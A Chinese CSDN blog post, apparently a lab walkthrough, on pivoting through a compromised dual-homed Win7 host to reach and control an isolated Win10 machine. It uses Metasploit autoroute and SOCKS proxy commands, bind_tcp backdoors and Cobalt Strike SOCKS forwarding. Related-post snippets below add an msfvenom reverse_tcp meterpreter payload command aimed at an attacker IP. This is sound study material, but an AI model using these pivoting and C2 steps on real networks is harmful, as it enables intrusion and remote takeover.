内网安全-代理Socks协议&CS-MSF控制上线

最新推荐文章于 2024-08-19 16:45:25 发布
最新推荐文章于 2024-08-19 16:45:25 发布
阅读量1.9k 收藏 4
点赞数 1
文章标签: 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65336233/article/details/128373449
版权

目录

实验前提

实验环境

实验目标

环境部署

实验1 msf通信win10的56网段与正向连接 

msf通信win10

msf上线win10

实验2 cs通信win10的56网段与正向连接

cs通信win10

cs上线win10

实验前提

 

实验环境

本地计算机存在一个36网段可以与win7ping通并且可以上网。

win7存在36和52网段,可以与本地和win10ping通。

win10存在52网段,只能与win7ping通并且无法上网。

实验目标

在获取win7和win10 webshell的前提下,因为win10无法上网,使主机可以与win10通信并上线cs与msf。

环境部署

Win7系统存在两个ip地址

192.168.52.130  无法出网或与主机ping通

192.168.36.130  可以出网并与主机ping通

 

Win10

192.168.52.131  无法出网或与主机链接,但是可以与win7的52网段相连

 

主机

仅存在36网段,可以win7的36网段相互ping通,无法与win10的ping通

 

实验1 msf通信win10的56网段与正向连接 

msf通信win10

先用kali生成后门并进行监听和运行后门实现msf上线win7

实战尝试中通过网站漏洞获取webshell,在通过免杀上传msf后门脚本并运行,在进行提权即可。以上不是本章重点不基于细节讲解

 

 

 

利用run post/multi/manage/autoroute命令获取win7上的所有路由

利用run autoroute -p查看目前路由情况,现在可以看到36和52两个网段的路由都获取到了

 

利用socks模块建立一个节点。可以理解为开放一个口子,方便代理工具进行代理。

use auxiliary/server/socks_proxy

set srvhost 0.0.0.0

set srvport 5555

run

 

利用socks工具,配置kali的地址和端口,msf中version为5,所以代理类型为socks5

端口因为在测试中出了一点问题,所以重新配了一遍换了端口,大家测试时直接就与msf中设置的端口一样即可

理解:就是我们通过msf模块开启的口子进行代理,因为现在通过msf已经有了win7的52网段,那么通过代理工具链接到这个口子,那么就可以访问到win7的52网段,从而访问win10信息

在win7系统里开启HFS(文件网络服务器),并且可以win7自己可以正常访问

 

在本地计算机中无法访问

 

 

在socks代理工具中生成浏览器进行链接,可以顺利的链接到内网地址,通信成功

 

 

msf上线win10

既然可以通信52网段,那么就可以进行msf控制上线

在生成一个后门脚本放入到win10中。注意:本次后门的生成采用的是bind_tcp,表示正向连接

 

查看session1依旧存在,设置bind的正向连接模块。注意:被动通常监听本地。bind是主动,所以要设置win10的ip(准备上线的ip地址)。run之后成功链接并提示通过52.130链接到52.131

 

 

 

实验2 cs通信win10的56网段与正向连接

cs通信win10

首先cs生成后门文件让win7进行上线 

通过以下方式cs可以直接生成随机的代理端口

右键会话-->代理转发-->Socks代理

 

使用pro并配置代理服务器,端口为socks代理生成的端口,版本为4  

 

点击检查并配置测试设置。因为要连接的是win10的52.131地址,所以ip为win10的ip地址,端口为80(利用HFS在win10中生成页面,默认80端口)。测试成功即可

 

在Win10上开启HFS

 

配置代理规则:名称任意,应用程序代表允许那些应用去走这个代理,目标主机为win10ip,端口可以固定或者任意,动作为设置的socks4的ip

 

 

打开浏览器,可以访问,通信成功

 

 


cs上线win10

在cs上配置监听器,本次依旧利用正向连接所以监听类型为bind,选择中选择带tcp的就行 

 

 

生成之后放入win10中 

 

在win7的52.130的会话中尝试利用命令链接win10的ip并通过监听的1111端口 

 

成功链接,并显示通过52.130的ip链接到的52.131

 

@墨竹
关注
红队内网攻防渗透:内网渗透之内网对抗:代理通讯篇&无外网或不可达&SockS协议&规则配置&C2正反向上线&解决方案
HACKONE的博客
06-19 270
攻击机使用socks5代理和web靶机通信,web靶机和二层主机使用4444端口通信,相当于全通。0、基石框架篇-单域、子域、父域、域树、域森林网络架构和搭建等。加入修改配置: /etc/proxychains4.conf。2、代理隧道篇-代理通讯网络不可达-SockS代理配置。1、代理隧道篇-代理通讯网络不可达-正反向连接上线。C2平台:MSF/CS/Sliver/Viper等。C2平台:MSF/CS/Sliver/Viper等。注意:配置连接IP为C2服务器IP。3、在工具上配置连接属性和规则触发。
内网安全——代理技术Socks5&网络通讯&控制上线
m0_61506558的博客
01-26 1056
主机出站TCP封杀,入站没有并且无互联网网络,可以尝试正向连接(取得一台有网络的能和主机通信的服务器权限,它有网),把数据给出网的机器,通过出网机器正向主动控制它。主机出站TCP被封杀,入站没有并且有互联网,可以尝试正向连接(取得一台有网络的能和主机通信的服务器权限,它有网),或者使用隧道技术(走其他协议出网即可)常规的渗透测试的流程,第二步是解决如何拿到权限,是横向移动的内容,这样先不介绍,进入第三部,解决如何进行控制。再添加节点,ip地址为本机外网服务器地址,端口为刚刚在msf设置的port。
记一次实验:redis未授权到cs上线(windows)
weixin_43875708的博客
02-01 1285
文章目录简介前期准备kali搭建cs服务器win10启动cs客户端探测靶机开放端口攻击步骤nmap探测是否存在redis未授权连接靶机rediscs上线cs开启监听redis写入powershell靶机重启,cs上线 简介 cs服务器:192.168.43.113(kali) cs客户端兼攻击机:192.168.43.101(win10) 靶机:192.168.43.42(win7) 前期准备 kali搭建cs服务器 sudo ./teamserver 192.168.43.113 yuchi123 w
msf代理内网
qq_42103643的博客
07-12 1801
思路:拿到shell之后先获取最高权限,方法uac绕过提权 然后获取hash,以后用于批量撞库啥的 解决shell内乱码:chcp 65001(在cmd内输入,需要在旧版本的kali输入命令界面的编辑,首选项,编码里改成gbk,新版的没找到改编码的地方,有大佬知道的教教我吧) msf内网穿透进公网,cs传shell给msf 1.msf内网穿透进公网,cs传给msf shell linux: ./frpc -f *******85a82:1454793 windows:frpc_windows_amd64
msf+proxychains组合搭建socks5隧道 | 内网穿透
最新发布
ULGANOY的博客
08-19 441
socks5隧道 | 内网穿透技术学习
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 2045
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线
剁椒鱼头没剁椒的博客
05-18 2216
本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。可以看到我下面已经列出了相关的IP地址,这里我就简单介绍一下。攻击机的目标是Windows7系统,而攻击机是无法直接连接Windows7,如果这里不了解我说的是什么意思,请去学习一下路由原理吧!自然而然下面也就不用解释了,肯定是能够连接能够连接能够连接到Windows7。目前攻击机只能够连接,但是我们可以通过采用一些技术而实现和Windows7。
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2591
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
内网渗透-代理Socks协议+路由不出网+后渗透通讯+CS-MSF控制上线
xiaoheizi的博客
11-07 972
思路:在win2008(192.168.11.136)执行正向连接的木马程序,然后让win10(192.168.11.129)去主动连接win2008(192.168.11.136),连接成功后,因为win10是已经被我们控制了的,所以win2008也就被控制了。1.拿下一台主机权限后,右键——代理转发——socks server——开始,建立节点。6.双击启动浏览器,成功使用我们的外网主机访问到了目标内网,实现了网络通讯。下载:https://www.17uoo.com/game/4226/
内网安全-隧道技术-防火墙限制协议绕过-文件传输
weixin_45701675的博客
04-18 4155
隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、 传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。 封装: 隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。 新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递 传输: 被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。 被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道 解包: 一旦到达网络终点,数据将被解包并转发到最终目的地
53-2 内网代理4 - frp搭建socks一级代理
weixin_43263566的博客
07-09 192
FRP是一款专注于内网穿透的高性能反向代理应用,支持多种协议如TCP、UDP、HTTP、HTTPS等,能够安全、便捷地将内网服务通过具有公网IP的中转节点暴露到公网。在网络渗透和远程访问管理中,FRP是一个常用的代理工具之一。此外,FRP还支持搭建SOCKS5代理应用。功能特点多协议支持:支持TCP、UDP、HTTP、HTTPS等多种网络协议安全性:提供安全的数据传输和访问控制。跨平台:提供了适用于Windows和Linux系统的两个版本。简易部署:通过简单的配置即可实现内网服务的公网访问。
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 6308
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
利用msf实现windows的上线与提权
weixin_52049485的博客
01-07 1700
环境部署 攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe 开启监听 use exploit/mult
利用MSF设置代理
Continuejww的博客
11-10 1285
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置。
msfsocks代理
weixin_74171325的博客
07-06 128
内网渗透-如何利用msf把流量代理内网-隧道搭建
weixin_42109829的博客
01-10 7082
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
Socks代理
weixin_51151498的博客
07-19 1621
全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080。
第六章-14 Socks代理应用
划水的小白白
12-05 595
零、需求 1.流量走向 本机(攻击机)—代理服务器—目标服务器 2.需求 3.机器环境介绍 一、启动CS 二、创建监听 三、生成木马并放置win ser服务器 先随便生成一个木马。 , , 四、在CS上创建socks代理 接下来的端口设置任意一个就行, 当然,图像化可能会比较方便。 , . , 将命令复制,在msf中执行。 五、使用msf设置代理 此时流量走向是: Msfcs—目标Win服务器。 我们在msf中执行的各种命令,会直接在“ win server服务器 ”上生效。 这个时
内网学习笔记03:msf添加路由&代理socks协议
qq_74218299的博客
08-02 708
然后看使用参数,srvhost设置为0.0.0.0或者127.0.0.1都行,意思是转发本地流量,srvport为转发端口可更改可不改,version为socks版本,4或者5都行。当我们查询到靶机的网段为10.0.0.1时,可以直接给他添加路由(若网段为x.0.0.1则添加x.0.0.1)此时靶机相当于网关,对流量进行转发,实现内网的访问。添加成功后,这个路由只能msf使用,若我们想用namp进行内网探测,还需开启socks代理。输入代理类型,ip地址还有代理端口,照着抄上面的就行了。
SOCKS5代理协议详解与应用实践
SOCKS5代理技术是一种广泛使用的网络代理协议,它提供了通用的代理服务,与特定的应用程序无关,确保了对新应用的兼容性。不同于仅在网络层或传输层工作的网络地址转换(NAT),SOCKS5代理不支持如ICMP包转发这样的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值